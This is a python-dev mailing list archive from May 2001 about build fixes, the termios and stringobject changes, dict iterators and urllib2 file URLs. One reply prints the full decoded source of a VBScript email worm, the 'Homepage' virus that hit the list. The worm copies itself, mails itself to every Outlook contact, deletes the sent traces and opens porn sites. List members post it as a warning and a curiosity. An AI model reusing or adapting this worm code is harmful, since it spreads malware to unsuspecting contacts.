From: mwh at python.net (Michael Hudson)
Date: Tue, 8 May 2001 15:41:45 +0100 (BST)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
Message-ID: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>

Guido van Rossum <guido at digicool.com> writes:

> > A change to termios.c in the last couple of days to #include termio.h
> > as well as termios.h breaks the build on FreeBSD, which has only
> > termios.h - needs an autoconf test? There'll probably be other similar
> > systems.
>
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.

If you don't include termio.h the build breaks on alpha/OSF1.  This
sounds to me like OSF1's headers are broken (you can't include
sys/ioctl.h without including termio.h first, it seems, or you get
complaints about struct termio being undefined).  So I'd suggest

+#ifdef __osf__
 #include <termio.h>
+#endif

and then see if the build breaks anywhere else (I love unix).

Using the sf compile farm, I've tested this on FreeBSD, Linux/x86,
Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives
a pile of warnings from redefined macros and then dies 'cause it can't
find a valid license file).

So we might need some more magic for solaris using cc.

Cheers,
M.

-- 
  Imagine if every Thursday your shoes exploded if you tied them
  the usual way.  This happens to us all the time with computers,
  and nobody thinks of complaining.                     -- Jeff Raskin


From fdrake at acm.org  Tue May  8 16:45:18 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT)
Subject: [Python-Dev] Recent change to termios module breaks build on
 FreeBSD
In-Reply-To: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain>
Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > If you don't include termio.h the build breaks on alpha/OSF1.  This
 > sounds to me like OSF1's headers are broken (you can't include
 > sys/ioctl.h without including termio.h first, it seems, or you get
 > complaints about struct termio being undefined).  So I'd suggest
 > 
 > +#ifdef __osf__
 >  #include <termio.h>
 > +#endif
 > 
 > and then see if the build breaks anywhere else (I love unix).

  Does it make more sense to do this or to test for termio.h in
configure?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas at per.dem.csiro.au  Tue May  8 16:47:39 2001
From: m.favas at per.dem.csiro.au (Mark Favas)
Date: Tue, 08 May 2001 22:47:39 +0800
Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD
References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com>
Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au>

Guido van Rossum wrote:
> 
> > A change to termios.c in the last couple of days to #include termio.h as
> > well as termios.h breaks the build on FreeBSD, which has only termios.h -
> > needs an autoconf test? There'll probably be other similar systems.
> 
> Frankly, I don't see the point of including termio.h at all -- it
> seems to be a backwards compatibility file.
> 
> Mark, can you please enter this in the bug database and assign it to
> whoever checked in the change? :-)

Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred
Drake <grin>

-- 
Mark Favas  -   m.favas at per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From thomas at xs4all.net  Tue May  8 17:52:49 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 8 May 2001 17:52:49 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200
References: <thomas@xs4all.net> <20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <20010508175248.E16486@xs4all.nl>

On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote:

[ Jack wants to add the +/- 1000 extra files from the MacPython source tree
  to the Python CVS repository ]

> It's actually 830 files. This is 320 .py files (130 in Lib, the rest in 
> Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build 
> system), 30 resource files and then assorted things (html documentation, 
> scripts to drive the distribution builder, etc).

I'd say merge it. If there had been decent CVS clients for the mac when you
started, those files would have been in the CVS tree already. 



From skip at pobox.com  Tue May  8 20:22:17 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 8 May 2001 13:22:17 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>
References: <thomas@xs4all.net>
	<20010508141000.A16486@xs4all.nl>
	<20010508140741.790E5379B72@snelboot.oratrix.nl>
Message-ID: <15096.14681.773554.729550@beluga.mojam.com>

    Jack> It's actually 830 files. ... 120 .c/.h files ...

How many of those 120 files are variants of existing source files that (in
theory) could be merged with their mainline counterparts?

Skip


From mwh at python.net  Wed May  9 00:27:59 2001
From: mwh at python.net (Michael Hudson)
Date: 08 May 2001 23:27:59 +0100
Subject: [Python-Dev] Recent change to termios module breaks build on  FreeBSD
In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)"
References: <Pine.LNX.4.30.0105081537190.9025-100000@localhost.localdomain> <15096.1662.137269.996490@cj42289-a.reston1.va.home.com>
Message-ID: <m3pudjscgg.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > If you don't include termio.h the build breaks on alpha/OSF1.  This
>  > sounds to me like OSF1's headers are broken (you can't include
>  > sys/ioctl.h without including termio.h first, it seems, or you get
>  > complaints about struct termio being undefined).  So I'd suggest
>  > 
>  > +#ifdef __osf__
>  >  #include <termio.h>
>  > +#endif
>  > 
>  > and then see if the build breaks anywhere else (I love unix).
> 
>   Does it make more sense to do this or to test for termio.h in
> configure?

If you're asking *me*, I have no idea.  I'd hope that no system would
be as broken as osf1 is in this regard, but then I'd have hoped that
osf1 wasn't this broken too...

I guess the test in configure is "safer" in some sense.  Getting this
perfectly right would probably require more autoconf hackery than one
can possibly imagine... ncurses generates an awk script from
./configure that is then run to produce term.h, but I'm not sure that
all of that is devoted to including the right headers.

can-we-just-have-TERMIOS-back?-ly y'rs
M.

-- 
  Good? Bad? Strap him into the IETF-approved witch-dunking
  apparatus immediately!                        -- NTK now, 21/07/2000


From tim.one at home.com  Wed May  9 08:48:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 02:48:12 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <20010508133638.Z16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEAAKBAA.tim.one@home.com>

[Tim]
> Given the new dict iterators in 2.2, there's an easier fast way
> that doesn't mutate the dict even under the covers:
>
> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

[Thomas Wouters]
> You probably want:
>
> arb = dict.iteritems().next
>
> so that you don't keep on returning the same key,value pair.

No, I would not want that.  If "arbitrary" suffices, then by defn. *any*
element is "good enough".  If it's not good enough to get the same one back
every time, then I want a stronger guarantee about what arb() returns than
the inexplicable behavior of repeated calls to dict.iteritems().next in the
presence of dict mutation.  But as I've said several times before <wink>, I'm
still asking for an algorithm where arb() is actually useful (as opposed to
.popitem(), which is dead easy to explain in the presence of mutation; your
version of arb() can, e.g., return a given entry more than once, may skip
entries, and may raise StopIteration with unexamined entries remaining in the
dict).
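Current CPython makes Tim's point visible, at least when the dict's size changes. A live iterator notices the change and raises RuntimeError on its next call. A sketch contrasting the live-iterator arb with popitem(), assuming Python 3:

```python
d = {"a": 1, "b": 2, "c": 3}

# Thomas's variant: keep a single iterator alive across calls.
arb = iter(d.items()).__next__

first = arb()              # some (key, value) pair
d["d"] = 4                 # the dict grows while that iterator is live

try:
    arb()
    invalidated = False
except RuntimeError:       # "dictionary changed size during iteration"
    invalidated = True

# popitem() stays easy to describe under mutation: each call removes and
# returns one pair of the dict as it is at that moment.
key, value = d.popitem()
```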

not-inclined-to-accept-shallow-comfort-at-the-cost-of-deep-confusion-ly
    y'rs  - tim


From tim.one at home.com  Wed May  9 09:42:00 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 03:42:00 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105090552.NAA08038@erebus.per.dem.csiro.au>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>

[Mark Favas]
> Changes in the last few hours (hi Tim!)

Hi Mark!  Sorry about that!

> to stringobject compile (I'd guess) on MS

You guess right -- and under two flavors of Windows <wink>.

> (and on Compaq's Tru64 compiler),

Figures.

> but produce the following with gcc on Solaris and FreeBSD:
>
> gcc -c -g -O2 -Wall -Wstrict-prototypes -I. -I./Include
> -DHAVE_CONFIG_H  -o Objects/stringobject.o Objects/stringobject.c
> Objects/stringobject.c: In function `PyString_FromStringAndSize':
> Objects/stringobject.c:76: invalid lvalue in unary `&'
> Objects/stringobject.c:80: invalid lvalue in unary `&'
> Objects/stringobject.c: In function `PyString_FromString':
> Objects/stringobject.c:130: invalid lvalue in unary `&'
> Objects/stringobject.c:134: invalid lvalue in unary `&'
> *** Error code 1

Fair enough:  I tried to use a cast as an lvalue in those 4 places, all of
the form:

    		PyString_InternInPlace(&(PyObject *)op);

where op is declared PyStringObject*.  Strictly speaking, that ain't legal,
but changing it to:

		PyObject *t = (PyObject *)op;
    		PyString_InternInPlace(&t);

is.  You may wonder WTF the difference is.  That's easy:  the rewrite doesn't
use a cast expression as an lvalue <wink>.

sensible-or-not-it's-checked-in-so-please-try-again-ly y'rs  - tim


From jack at oratrix.nl  Wed May  9 10:16:29 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 09 May 2001 10:16:29 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge 
In-Reply-To: Message by <skip@pobox.com> ,
	     Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> 
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how many statistics I gather about MacPython in just a few
days:-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one at home.com  Wed May  9 10:20:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.
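The two tuples Neil quotes are the optional-release and mandatory-release fields of a `__future__._Feature`. In today's Python 3 `__future__` module, `nested_scopes` carries the `(2, 2, 0, "alpha", 0)` mandatory release that Neil proposed. The small sketch below compares that field with the running interpreter's version. The helper name `is_mandatory` is hypothetical. The mandatory field may be `None` when no release has been fixed yet, so the helper handles that case.

```python
import __future__
import sys


def is_mandatory(feature, version=sys.version_info):
    """True if `feature` is always on in `version` (hypothetical helper)."""
    mandatory = feature.getMandatoryRelease()
    if mandatory is None:
        # No mandatory release has been fixed; the feature is still optional.
        return False
    # Release tuples are (major, minor, micro, level, serial) and compare
    # element-wise; "alpha" < "beta" < "candidate" < "final" sorts correctly.
    return tuple(version) >= mandatory


ns = __future__.nested_scopes
print(ns.getOptionalRelease())   # first release accepting the future import
print(ns.getMandatoryRelease())  # first release where it is the default
print(is_mandatory(ns))
```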


From thomas at xs4all.net  Wed May  9 10:58:50 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove only os.pyc, I get the enlightening:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)


From thomas at xs4all.net  Wed May  9 11:14:32 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May  9 11:29:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree, even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 17:49:29 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400 
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>


Hi!

You've got to see this page! It's really cool ;O)


-------------- next part --------------
A non-text attachment was scrubbed...
Name: homepage.HTML.vbs
Type: application/octet-stream
Size: 2419 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010509/144ed4b6/attachment.obj>

From guido at digicool.com  Wed May  9 19:08:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
             <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at pythonware.com  Wed May  9 18:12:00 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr at thyrsus.com  Wed May  9 18:20:24 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido at digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:21:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry at digicool.com  Wed May  9 18:23:26 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
	<200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:47:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From pedroni at inf.ethz.ch  Wed May  9 19:12:20 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability: when I was younger
(and I'm not that old), a bad guy had to use assembler to cause
some damage; now, thanks to MS, which doesn't care much about security
but likely cares a lot about self-confidence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one at home.com  Wed May  9 19:47:22 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d@mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising you to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 20:50:25 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400 
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one at home.com  Wed May  9 21:30:41 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urllib2 takes more than 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory:
     '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'
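One quick way to see why both spellings fail is to check how a URL parser splits them. The sketch below uses Python 3's `urllib.parse.urlsplit`, not the 2001 urllib2 code, so it is only an illustration. With two slashes, the whole Windows path lands in the host (netloc) slot, which is consistent with the slow "host not found" failure. With three slashes, the host is empty and the path keeps a leading slash, which is consistent with the `'\\c:\\...'` path in the IOError.

```python
from urllib.parse import urlsplit

path = r"c:\code\python\dist\src\lib\urllib2.pyc"

# Two slashes: everything after "//" up to the next "/" is the host part,
# and this Windows path contains no "/", so the whole path becomes the host.
two = urlsplit("file://%s" % path)
print(repr(two.netloc), repr(two.path))

# Three slashes: the host is empty and the path keeps a leading "/".
three = urlsplit("file:///%s" % path)
print(repr(three.netloc), repr(three.path))
```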

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.


From mwh at python.net  Wed May  9 21:50:34 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake at users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake at acm.org  Wed May  9 22:09:09 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
	<m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
